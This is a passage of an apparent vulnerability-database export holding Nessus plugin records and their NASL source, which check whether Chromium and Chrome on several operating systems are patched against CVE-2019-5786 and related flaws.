(!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2019:0481\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-72.0.3626.121-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-72.0.3626.121-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"chromium-browser-debuginfo-72.0.3626.121-1.el6_10\", allowmaj:TRUE)) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"chromium-browser-debuginfo-72.0.3626.121-1.el6_10\", allowmaj:TRUE)) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium-browser / chromium-browser-debuginfo\");\n }\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T03:33:38", "description": "The version of Google Chrome installed on the remote macOS host is\nprior to 72.0.3626.121. It is, therefore, affected by a vulnerability\nas referenced in the 2019_03_stable-channel-update-for-desktop\nadvisory.\n\n - Use-after-free in FileReader. (CVE-2019-5786)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.", "edition": 18, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2019-03-06T00:00:00", "title": "Google Chrome < 72.0.3626.121 Vulnerability", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5786"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_72_0_3626_121.NASL", "href": "https://www.tenable.com/plugins/nessus/122616", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(122616);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/10/31 15:18:51\");\n\n script_cve_id(\"CVE-2019-5786\");\n script_bugtraq_id(107213);\n\n script_name(english:\"Google Chrome < 72.0.3626.121 Vulnerability\");\n script_summary(english:\"Checks the version of Google Chrome.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by a\nvulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is\nprior to 72.0.3626.121. It is, therefore, affected by a vulnerability\nas referenced in the 2019_03_stable-channel-update-for-desktop\nadvisory.\n\n - Use-after-free in FileReader. (CVE-2019-5786)\n\nNote that Nessus has not tested for this issue but has instead relied\nonly on the application's self-reported version number.\");\n # https://chromereleases.googleblog.com/2019/03/stable-channel-update-for-desktop.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df49025b\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/936448\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 72.0.3626.121 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5786\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/03/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"MacOSX/Google Chrome/Installed\");\n\ngoogle_chrome_check_version(fix:'72.0.3626.121', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-20T12:50:51", "description": "This update for chromium fixes the following issues :\n\nChromium was updated: to 72.0.3626.121 :\n\n - CVE-2019-5786: Use-after-free in FileReader fixed\n (boo#1127602)\n\n - Feature fixes update only", "edition": 11, "cvss3": {"score": 6.5, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"}, "published": "2019-03-08T00:00:00", "title": "openSUSE Security Update : chromium (openSUSE-2019-298)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5786"], "modified": "2019-03-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "cpe:/o:novell:opensuse:15.0", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debugsource", "p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromium-debuginfo"], "id": "OPENSUSE-2019-298.NASL", "href": "https://www.tenable.com/plugins/nessus/122714", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-298.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(122714);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2019-5786\");\n\n script_name(english:\"openSUSE Security Update : chromium (openSUSE-2019-298)\");\n script_summary(english:\"Check for the openSUSE-2019-298 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for chromium fixes the following issues :\n\nChromium was updated: to 72.0.3626.121 :\n\n - CVE-2019-5786: Use-after-free in FileReader fixed\n (boo#1127602)\n\n - Feature fixes update only\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1127602\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected chromium packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/06/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-72.0.3626.121-lp150.2.46.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-debuginfo-72.0.3626.121-lp150.2.46.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-72.0.3626.121-lp150.2.46.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-debuginfo-72.0.3626.121-lp150.2.46.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-debugsource-72.0.3626.121-lp150.2.46.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2021-01-01T02:57:07", "description": "The remote host is affected by the vulnerability described in GLSA-201903-23\n(Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google\n Chrome. Please review the referenced CVE identifiers and Google Chrome\n Releases for details.\n \nImpact :\n\n Please review the referenced CVE identifiers and Google Chrome Releases\n for details.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 16, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-28T00:00:00", "title": "GLSA-201903-23 : Chromium: Multiple vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5802", "CVE-2019-5789", "CVE-2019-5803", "CVE-2019-5792", "CVE-2019-5801", "CVE-2019-5793", "CVE-2019-5804", "CVE-2019-5797", "CVE-2019-5798", "CVE-2019-5795", "CVE-2019-5786", "CVE-2019-5799", "CVE-2019-5796", "CVE-2019-5791", "CVE-2019-5790", "CVE-2019-5794", "CVE-2019-5800", "CVE-2018-17479", "CVE-2019-5788", "CVE-2019-5787"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:gentoo:linux", "p-cpe:/a:gentoo:linux:chromium"], "id": "GENTOO_GLSA-201903-23.NASL", "href": "https://www.tenable.com/plugins/nessus/123429", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 201903-23.\n#\n# The advisory text is Copyright (C) 2001-2019 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123429);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/06/04 9:45:00\");\n\n script_cve_id(\"CVE-2018-17479\", \"CVE-2019-5786\", \"CVE-2019-5787\", \"CVE-2019-5788\", \"CVE-2019-5789\", \"CVE-2019-5790\", \"CVE-2019-5791\", \"CVE-2019-5792\", \"CVE-2019-5793\", \"CVE-2019-5794\", \"CVE-2019-5795\", \"CVE-2019-5796\", \"CVE-2019-5797\", \"CVE-2019-5798\", \"CVE-2019-5799\", \"CVE-2019-5800\", \"CVE-2019-5801\", \"CVE-2019-5802\", \"CVE-2019-5803\", \"CVE-2019-5804\");\n script_xref(name:\"GLSA\", value:\"201903-23\");\n\n script_name(english:\"GLSA-201903-23 : Chromium: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201903-23\n(Chromium: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been discovered in Chromium and Google\n Chrome. Please review the referenced CVE identifiers and Google Chrome\n Releases for details.\n \nImpact :\n\n Please review the referenced CVE identifiers and Google Chrome Releases\n for details.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201903-23\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All Chromium users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose\n '>=www-client/chromium-73.0.3683.75'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/05/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/28\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-client/chromium\", unaffected:make_list(\"ge 73.0.3683.75\"), vulnerable:make_list(\"lt 73.0.3683.75\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"Chromium\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T02:23:31", "description": "Update to 73.0.3683.75. Fixes large bucket of CVEs.\n\nCVE-2019-5754 CVE-2019-5782 CVE-2019-5755 CVE-2019-5756 CVE-2019-5757\nCVE-2019-5758 CVE-2019-5759 CVE-2019-5760 CVE-2019-5761 CVE-2019-5762\nCVE-2019-5763 CVE-2019-5764 CVE-2019-5765 CVE-2019-5766 CVE-2019-5767\nCVE-2019-5768 CVE-2019-5769 CVE-2019-5770 CVE-2019-5771 CVE-2019-5772\nCVE-2019-5773 CVE-2019-5774 CVE-2019-5775 CVE-2019-5776 CVE-2019-5777\nCVE-2019-5778 CVE-2019-5779 CVE-2019-5780 CVE-2019-5781 CVE-2019-5784\nCVE-2019-5786 CVE-2019-5787 CVE-2019-5788 CVE-2019-5789 CVE-2019-5790\nCVE-2019-5791 CVE-2019-5792 CVE-2019-5793 CVE-2019-5794 CVE-2019-5795\nCVE-2019-5796 CVE-2019-5797 CVE-2019-5798 CVE-2019-5799 CVE-2019-5800\nCVE-2019-5802 CVE-2019-5803\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 17, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-26T00:00:00", "title": "Fedora 29 : chromium (2019-561eae4626)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5766", "CVE-2019-5769", "CVE-2019-5758", "CVE-2019-5761", "CVE-2019-5767", "CVE-2019-5777", "CVE-2019-5772", "CVE-2019-5802", "CVE-2019-5789", "CVE-2019-5763", "CVE-2019-5771", "CVE-2019-5803", "CVE-2019-5776", "CVE-2019-5764", "CVE-2019-5755", "CVE-2019-5792", "CVE-2019-5762", "CVE-2019-5757", "CVE-2019-5768", "CVE-2019-5754", "CVE-2019-5782", "CVE-2019-5801", "CVE-2019-5779", "CVE-2019-5756", "CVE-2019-5793", "CVE-2019-5770", "CVE-2019-5778", "CVE-2019-5804", "CVE-2019-5797", "CVE-2019-5798", "CVE-2019-5795", "CVE-2019-5786", "CVE-2019-5799", "CVE-2019-5775", "CVE-2019-5773", "CVE-2019-5796", "CVE-2019-5780", "CVE-2019-5791", "CVE-2019-5784", "CVE-2019-5765", "CVE-2019-5781", "CVE-2019-5759", "CVE-2019-5790", "CVE-2019-5760", "CVE-2019-5794", "CVE-2019-5800", "CVE-2019-5788", "CVE-2019-5787", "CVE-2019-5774"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:29", "p-cpe:/a:fedoraproject:fedora:chromium"], "id": "FEDORA_2019-561EAE4626.NASL", "href": "https://www.tenable.com/plugins/nessus/123100", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2019-561eae4626.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(123100);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2020/02/03\");\n\n script_cve_id(\"CVE-2019-5754\", \"CVE-2019-5755\", \"CVE-2019-5756\", \"CVE-2019-5757\", \"CVE-2019-5758\", \"CVE-2019-5759\", \"CVE-2019-5760\", \"CVE-2019-5761\", \"CVE-2019-5762\", \"CVE-2019-5763\", \"CVE-2019-5764\", \"CVE-2019-5765\", \"CVE-2019-5766\", \"CVE-2019-5767\", \"CVE-2019-5768\", \"CVE-2019-5769\", \"CVE-2019-5770\", \"CVE-2019-5771\", \"CVE-2019-5772\", \"CVE-2019-5773\", \"CVE-2019-5774\", \"CVE-2019-5775\", \"CVE-2019-5776\", \"CVE-2019-5777\", \"CVE-2019-5778\", \"CVE-2019-5779\", \"CVE-2019-5780\", \"CVE-2019-5781\", \"CVE-2019-5782\", \"CVE-2019-5784\", \"CVE-2019-5786\", \"CVE-2019-5787\", \"CVE-2019-5788\", \"CVE-2019-5789\", \"CVE-2019-5790\", \"CVE-2019-5791\", \"CVE-2019-5792\", \"CVE-2019-5793\", \"CVE-2019-5794\", \"CVE-2019-5795\", \"CVE-2019-5796\", \"CVE-2019-5797\", \"CVE-2019-5798\", \"CVE-2019-5799\", \"CVE-2019-5800\", \"CVE-2019-5801\", \"CVE-2019-5802\", \"CVE-2019-5803\", \"CVE-2019-5804\");\n script_xref(name:\"FEDORA\", value:\"2019-561eae4626\");\n\n script_name(english:\"Fedora 29 : chromium (2019-561eae4626)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 73.0.3683.75. Fixes large bucket of CVEs.\n\nCVE-2019-5754 CVE-2019-5782 CVE-2019-5755 CVE-2019-5756 CVE-2019-5757\nCVE-2019-5758 CVE-2019-5759 CVE-2019-5760 CVE-2019-5761 CVE-2019-5762\nCVE-2019-5763 CVE-2019-5764 CVE-2019-5765 CVE-2019-5766 CVE-2019-5767\nCVE-2019-5768 CVE-2019-5769 CVE-2019-5770 CVE-2019-5771 CVE-2019-5772\nCVE-2019-5773 CVE-2019-5774 CVE-2019-5775 CVE-2019-5776 CVE-2019-5777\nCVE-2019-5778 CVE-2019-5779 CVE-2019-5780 CVE-2019-5781 CVE-2019-5784\nCVE-2019-5786 CVE-2019-5787 CVE-2019-5788 CVE-2019-5789 CVE-2019-5790\nCVE-2019-5791 CVE-2019-5792 CVE-2019-5793 CVE-2019-5794 CVE-2019-5795\nCVE-2019-5796 CVE-2019-5797 CVE-2019-5798 CVE-2019-5799 CVE-2019-5800\nCVE-2019-5802 CVE-2019-5803\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2019-561eae4626\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected chromium package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-5789\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Chrome 72.0.3626.119 FileReader UaF exploit for Windows 7 x86');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/02/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"chromium-73.0.3683.75-2.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-31T17:53:13", "description": "Update to 73.0.3683.75. Fixes large bucket of CVEs.\n\nCVE-2019-5754 CVE-2019-5782 CVE-2019-5755 CVE-2019-5756 CVE-2019-5757\nCVE-2019-5758 CVE-2019-5759 CVE-2019-5760 CVE-2019-5761 CVE-2019-5762\nCVE-2019-5763 CVE-2019-5764 CVE-2019-5765 CVE-2019-5766 CVE-2019-5767\nCVE-2019-5768 CVE-2019-5769 CVE-2019-5770 CVE-2019-5771 CVE-2019-5772\nCVE-2019-5773 CVE-2019-5774 CVE-2019-5775 CVE-2019-5776 CVE-2019-5777\nCVE-2019-5778 CVE-2019-5779 CVE-2019-5780 CVE-2019-5781 CVE-2019-5784\nCVE-2019-5786 CVE-2019-5787 CVE-2019-5788 CVE-2019-5789 CVE-2019-5790\nCVE-2019-5791 CVE-2019-5792 CVE-2019-5793 CVE-2019-5794 CVE-2019-5795\nCVE-2019-5796 CVE-2019-5797 CVE-2019-5798 CVE-2019-5799 CVE-2019-5800\nCVE-2019-5802 CVE-2019-5803\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 10, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-02T00:00:00", "title": "Fedora 30 : chromium (2019-05a780936d)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-5766", "CVE-2019-5769", "CVE-2019-5758", "CVE-2019-5761", "CVE-2019-5767", "CVE-2019-5777", "CVE-2019-5772", "CVE-2019-5802", "CVE-2019-5789", "CVE-2019-5763", "CVE-2019-5771", "CVE-2019-5803", "CVE-2019-5776", "CVE-2019-5764", "CVE-2019-5755", "CVE-2019-5792", "CVE-2019-5762", "CVE-2019-5757", "CVE-2019-5768", "CVE-2019-5754", "CVE-2019-5782", 